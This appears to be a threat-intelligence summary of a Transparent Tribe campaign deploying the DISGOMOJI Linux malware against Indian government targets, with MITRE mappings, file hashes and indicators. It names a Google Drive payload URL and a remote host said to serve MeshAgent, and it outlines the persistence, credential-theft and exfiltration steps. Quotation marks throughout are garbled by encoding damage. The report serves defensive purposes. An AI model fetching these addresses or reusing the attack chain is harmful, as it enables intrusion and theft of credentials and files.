APT-C-56, also known as Transparent Tribe, has been observed deploying a Golang-based ELF malware variant called DISGOMOJI that uses Google Drive and Google Cloud Platform for C2 communications and data exfiltration. The group targets Indian government and military personnel with sophisticated multi-stage attacks involving persistence mechanisms and credential theft. #APT-C-56 #DISGOMOJI #GoogleCloudPlatform
Keypoints
- APT-C-56 (Transparent Tribe) is a South Asia-based APT group focusing on India and neighboring countries, specializing in targeted spear-phishing attacks.
- The group uses a multi-stage attack chain deploying a Golang-based ELF malware variant named DISGOMOJI that communicates via Google Drive and Google Cloud Platform.
- The initial infection method involves a password-protected zip file containing an encrypted PDF and a âPasswordâ ELF file that downloads and decrypts subsequent payloads.
- Malware employs persistence by modifying the victimâs .bashrc file and scheduling periodic execution via cron jobs.
- The final payload, x96coreinfo, steals Firefox passwords using the open-source firefox_decrypt tool and exfiltrates various document and image files to attacker-controlled Google Cloud storage.
- Attackers deploy a malicious Firefox extension and install MeshAgent remote management software for long-term control.
- This campaign reflects continuous malware evolution with the use of cloud services for stealthy command and control and demonstrates high fault tolerance in the attack chain.
MITRE Techniques
- [T1566] Phishing â Inducing users to execute a file named âPasswordâ inside a zipped archive to initiate infection (âusers are induced to execute a file named password ⌠that displays a decoy document password while downloading subsequent componentsâ).
- [T1543] Create or Modify System Process â Modifying the .bashrc file and scheduling cron jobs for persistence (âwriting configuration commands to â.bashrcâ and adding a cron job to ensure executionâ).
- [T1105] Ingress Tool Transfer â Downloading subsequent payloads from Google Drive URLs (âdownloading âx96coreinfoâ, âecâ, and other files from specific Google Drive public addressesâ).
- [T1027] Obfuscated Files or Information â Use of encrypted intermediate files and multiple layers of encryption with RC4 and AES (ââecâ file used to decrypt âintermediateâ and âx96coreinfoâ using RC4 and AES algorithmsâ).
- [T1059] Command and Scripting Interpreter â Execution of Java JAR files and shell scripts to facilitate payload deployment (âexecuting âx96-dependencies.jarâ with âjava -jarâ command and shell scripts for downloading and launching malwareâ).
- [T1083] File and Directory Discovery â Collecting files with specific extensions from the working directory for exfiltration (âstealing files with extensions such as .doc, .pdf, .xls, .jpg from the current working directoryâ).
- [T1113] Screen Capture â Implicitly suggested via browser monitoring to steal session cookies and user UUIDs (âmonitoring visits to sites like https://email.gov.in and stealing cookies and uuidâ).
- [T1021] Remote Services â Installing MeshAgent remote management tool for ongoing control (âinstalling MeshAgent via script hosted on remote domainâ).
Indicators of Compromise
- [MD5 hashes] Samples of malware and related files including Protected_Document.zip (452cd18570471e80dd6bf34addede334), Password ELF (d5a3766e744a563278b18267d6bd7113), decryption tool ec (c763ecf315481525afcd47c5f32c1fd7), and final payload x96coreinfo (c8c21b4642f12c28f6e5e0389bbf8c36) among others.
- [Domains/URLs] Command and control cloud storage and script download URLs hosted on Google Drive (e.g., drive.google.com/uc?export=download&id=1ZreMbUude-F2zLWWeO2FNiKU7I7v7aSe) and remote script hosts such as saadac3.accesscam.org for MeshAgent deployment.
- [File Names] Key malware components include âPasswordâ (ELF executable), âx96coreinfoâ (final payload ELF), âecâ (encryption/decryption ELF), and âx96-dependencies.jarâ (Java archive downloader).
Read more: https://www.ctfiot.com/253976.html